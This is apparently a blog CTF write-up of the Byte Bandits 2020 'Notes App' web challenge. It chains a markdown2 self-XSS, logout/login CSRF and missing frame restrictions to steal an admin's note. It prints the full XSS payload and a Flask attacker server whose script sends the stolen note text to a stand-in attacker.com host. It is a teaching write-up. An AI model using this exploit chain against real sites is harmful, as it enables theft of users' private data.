Chaining No impact(N/A) Bugs to get High impact





I have gone through a `Byte Bandits 2020 CTF` conducted by Byte Bandits team.
There is a web challenge `Notes App`
Which is pretty cool, just a chaining of small bugs (which are encountered at Bug Hunting and treated as N/A or Out of scope).
Which made me to elaborate it, Write it as an Article.


Notes App

A service running at `https://notes.web.byteband.it/` and given source code.
Functionality is simple that, every user have only one note(sanitised by markdown2) and Admin have it too(That is the FLAG).
Given an Admin bot which loads the admin account and then visits our URL (no domain restrictions).

Observation - 1

As there is a Admin bot, visiting links. There might be a chance for SSRF etc.
So first tried for XSS. After so many trails, searches my teammate found https://github.com/trentm/python-markdown2/issues/341
Through that we got XSS, but no use. It's a SELF XSS :(
payload 
<http://g<!s://q?<!-<[<script>alert(1);/\\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>aler(1);/*](http://g)->a>

Observation - 2

what we can do with SELF XSS (individually) , Again looked at the site and listed the issues
1) Logout CSRF (/logout)
2) Login CSRF (/login?username=xxxx&password=xxxxxx)
3) SELF XSS
4) No IFRAME Restrictions
All are low level bugs which made me to not get recognised at starting.

Finally

After some trails by combining them, finally crafted an attack!


Exploitation

1) Create an Attacker account, inject the XSS payload. 
<http://g<!s://q?<!-<[<script>dd = document.createElement("script");dd.src = "https://attacker.com/final.js";document.head.appendChild(dd);/\\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>aler(1);/*](http://g)->a>
2) Create an attacker server based on that methodology 
#!/usr/bin/env python3

from flask import *
from time import sleep

app = Flask(__name__)

@app.route("/")
def home():
    return "OK"

@app.route("/main")
def main():
    return '''
<html>
<head>
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
</head>
    <div id=iframe1></div>
    <div id=iframe2></div>
</html>
<script>
function sleep(ms) {
    return new Promise(resolve => setTimeout(resolve, ms));
}
async function main(){
    ifr = document.createElement('iframe');
    ifr.src = "https://notes.web.byteband.it/profile";
    ifr.name='admin';
    iframe1.appendChild(ifr);
    await sleep(500);
    ifr2 = document.createElement('iframe');
    ifr2.name='attack';
    ifr2.src = "/change-account";
    iframe2.appendChild(ifr2);
}
main();
</script>
<img src="/sleep.png">
'''

@app.route("/change-account")
def change():
    return '''
<script>
function sleep(ms) {
    return new Promise(resolve => setTimeout(resolve, ms));
}
async function main(){
    await sleep(500);
    ifr = document.createElement('img');
    ifr.src = "https://notes.web.byteband.it/logout";
    document.body.appendChild(ifr);
    await sleep(500);
    window.location = "https://notes.web.byteband.it/login?username=%s&password=%s";
}
main();
</script>
'''%(attacker_username, attacker_password)

@app.route("/sleep.png")
def sledp():
    sleep(10)
    return ""

@app.route("/final.js")
def js():
 script = '''
idr = document.createElement('img');
idr.src = "https:///?a="+window.top.frames[0].document.getElementsByTagName('p')[1].innerText;
document.body.appendChild(idr);
'''%attacker_server
    resp = Response(script)
    resp.headers['Content-Type'] = 'text/javascript'
    return resp

attacker_username = "attacker" # redacted
attacker_password = "p4ssw0rd" # redacted
attacker_server = "attacker.com" # redacted

if __name__=='__main__':
    app.run()
Note : To make the bot to give some for this process, Added `<img src="/sleep.png">` Which takes at least 10 sec to load from server.
3) Submitting the final URL (https://attacker.com/main) to bot

Flag :

flag{ch41n_tHy_3Xploits_t0_w1n}

Comments

Post a Comment

Popular posts from this blog

Square CTF 2019 Writeup's

Image
   [*]-challenges    [+] (one   - 100 pts) Talk to me    [+] (two   - 700 pts) Aesni    [+] (three - 150 pts) Decode me    [+] (five  - 200 pts) Inwasmble    [+] (seven - 600 pts) Lockbox    [+] (nine  - 700 pts) Sudo make me a flag Our Team Invaders ended up at 19th position With points 3450 points Talk to me A service running at `talk-to-me-dd00922915bfc3f1.squarectf.com:5678` $ nc talk-to-me-dd00922915bfc3f1.squarectf.com 5678 Hello! aaaaaaaaaaaa Sorry, I can't understand you. Saying Hello! and asking for input(aaaaaaaaaaaa) Then returning a message After some trails, Two errors meant a lot (for 1 and ') $ nc talk-to-me-dd00922915bfc3f1.squarectf.com 5678 Hello! 1 undefined method `match' for 1:Integer /talk_to_me.rb:16:in `receive_data' /var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run_machine' /var/lib/gems/2.5.0/gems/eventmachine-1.2.7/lib/eventmachine.rb:195:in `run' /talk_to_me.rb:31:in ` '
Read more

K3RN3L CTF 2021 Rev - `Recurso & Rasm ` writeups

Image
This is a write-up for Reverse engineering challenges in K3RN3LCTF 2021 based on VM Concept using Recurso Language [*]-challenges     [+] (Rev - 500 pts) Recurso ( First Blood )     [+] (Rev - 500 pts) Rasm (After CTF) Our Team zh3ro ended up at 9 th position in `K3RN3LCTF - 2021`. These Reverse engineering challs are interesting -> Both are based on one vm only (Recurso), different compiled scripts . (leFlag.recc , rasm.recc) Recurso Given a Recurso Execuatable which can compile, run recurso sccrips. And a leFlag.recc (a recurso compiled file) containing a flag checking logic, can be run by given Recurso executable. The Goal of the challenge is to get the flag checking logic in leFlag.recc and steal flag Decompile and Analyse -> Recurso First we have to get to know about how the Recurso is running this byte code in order to get the logic of le
Read more

InCTF 2019 writeup's

[+] (Rev - 100 pts) cliche_crackme [+] (Web - 856 pts) s3cur3-r3v Our Team Invaders end up at 9th position With points 4375 points cliche_crackme (Rev) By dissambling the exectuable; It is just encrypting our input Checking with data string It is doing simply data = b'\xd7\xcc\xdd\xcf\xe4\xbd\xd1\x9d\xdd\xdc\xc8\xd1\xce\x9a\x9a\xc8\xd5\x99\xdd\xc8\x99\xcf\xc8\xe0\x99\xdb\xd4\xc8\xe0\x9d\xdc\xc8\xd2\xdd\xa8\xe6\xd1\xe2\xd4\xe9\xc2\xd6\xa2\xe2\xe1\xcd\xd6\xd3\x9f\x9f\xcd\xda\x9e\xe2\xcd\x9e\xd4\xcd\xe5\x9e\xe0\xd9\xcd\xe5\xa2\xe1\xcd\xd7\xe2\xad\xeb\xd7\xc9\xde\xb7\xcb\x97\xd7\xd6\xc2\xcb\xc8\x94\x94\xc2\xcf\x93\xd7\xc2\x93\xc9\xc2\xda\x93\xd5\xce\xc2\xda\x97\xd6\xc2\xcc\xd7\xa2\xe0\xda\xef\xc8\xdc\xa8\xe8\xe7\xd3\xdc\xd9\xa5\xa5\xd3\xe0\xa4\xe8\xd3\xa4\xda\xd3\xeb\xa4\xe6\xdf\xd3\xeb\xa8\xe7\xd3\xdd\xe8\xb3\xf1\xe1\xba\xce\x9a\xda\xd9\xc5\xce\xcb\x97\x97\xc5\xd2\x96\xda\xc5\x96\xcc\xc5\xdd\x96\xd8\xd1\xc5\xdd\x9a\xd9\xc5\xcf\xda\xa5
Read more